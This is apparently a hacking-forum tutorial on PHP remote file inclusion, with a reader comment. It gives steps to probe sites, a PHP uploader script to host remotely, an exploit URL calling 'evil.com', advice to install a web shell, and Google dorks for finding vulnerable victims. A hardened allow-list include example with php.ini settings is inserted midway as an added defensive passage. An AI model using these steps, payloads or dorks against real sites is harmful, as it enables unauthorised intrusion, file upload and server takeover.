
Include Exploits



By ghostghost | 94091 Reads |

In this article I will teach you the basics of Include Exploits. If you understand PHP then this will help, although not much.

When a site uses one page to call all the others around a basic template, it can become subject to exploitation under certain circumstances.

e.g. http://www.abc.com/index.php?page=news

To test if it's vulnerable, try changing it to abc or whatever

e.g. http://www.abc.com/index.php?page=abc

If it's vulnerable you should get an error like this:

Warning: main(abc.php): failed to open stream: No such file or directory in /home/dir/public_html/index.php on line 01

Ok, now we are in business. We now know that the script takes $_GET['page'] and adds .php, then includes it.

e.g. $page = $_GET ['page'] . ".php"; include ($page);
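The hardened counterpart of the include shown above, as an added example that is not part of the original article: the `page` value is only ever compared against a fixed allow-list, so it never reaches `include` as a path or URL. `PAGES_DIR`, `ALLOWED_PAGES`, `DEFAULT_PAGE`, `resolve_page()` and the page names are hypothetical, and PHP 7.1 or later is assumed.

```php
<?php
// Added example: allow-list replacement for
//   $page = $_GET['page'] . ".php"; include($page);
// All names below are hypothetical; the page list is constructed sample data.
const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['news', 'downloads', 'contact'];
const DEFAULT_PAGE = 'news';

/**
 * Map the user-supplied ?page= value to a file that is safe to include.
 * Returns null when the value is not an exact allow-list entry.
 */
function resolve_page($requested): ?string
{
    // ?page[]=x arrives as an array; only plain strings are acceptable.
    if (!is_string($requested)) {
        return null;
    }
    // Exact, strict match: URLs, "../" sequences and null bytes can never
    // equal an allow-list entry, so they are rejected without any parsing.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    // Defence in depth: the resolved path must still sit inside PAGES_DIR
    // (catches a symlink or a mistake in the allow-list itself).
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $requested . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$file = resolve_page($_GET['page'] ?? DEFAULT_PAGE);
if ($file === null) {
    // Generic 404: no PHP warning is produced, so the include path is never
    // echoed back the way the "failed to open stream" message above is.
    http_response_code(404);
    error_log('rejected page parameter: ' . json_encode($_GET['page'] ?? null));
    exit('Page not found');
}
include $file;
```

Independently of the code, keeping `allow_url_include = Off` (the default since PHP 5.2) and `display_errors = Off` in php.ini stops `include` from fetching remote URLs and keeps warnings out of the response.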

So, what we need now is an uploader to allow us to upload files on to their server. Here's some dazzling code written by cheesy himself:

<?php
// Relies on the old register_globals behaviour: the upload field "userfile"
// populates $userfile (temporary path) and $userfile_name (original name).
if ( $userfile ) {
    @$res = copy($userfile, "$userfile_name");
    if ( !$res ) {
        print "Upload failed! \n";
    } else {
        print "Upload of $userfile_name successful \n";
    }
}
?>

<FORM method=POST ENCTYPE="multipart/form-data">
File to Upload
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="5000000">
<INPUT NAME="userfile" TYPE="file" size=35>
<INPUT TYPE="submit">
</FORM>
</HTML>

So, we need to host this code on a server that doesn't support PHP, or just edit your .htaccess so your server treats it as HTML or whatever. A good, simple free host that doesn't support PHP and is quick, easy and anonymous is cjb.net

So to exploit the page simply add your url for the uploader script:

e.g. http://www.abc.com/index.php?page=http://evil.com/uploader

Remember, if the site adds .php to the page variable, be sure to leave it off. Then the uploader pops up and you can install webadmin or a web-based shell.

To find vulnerable sites, we can use our best friend, Google. Good searches include:

inurl:"index.php?page=downloads"
inurl:"index.php?page=news.php"

Be imaginative :)

Thanks for reading and I hope you've learnt something new.

Will.

Comments
sam207 15 years ago

"inurl:.php?page=" is the good dork to use I think.. It's a nice article though I don't feel it's awesome.. Very Good I choose..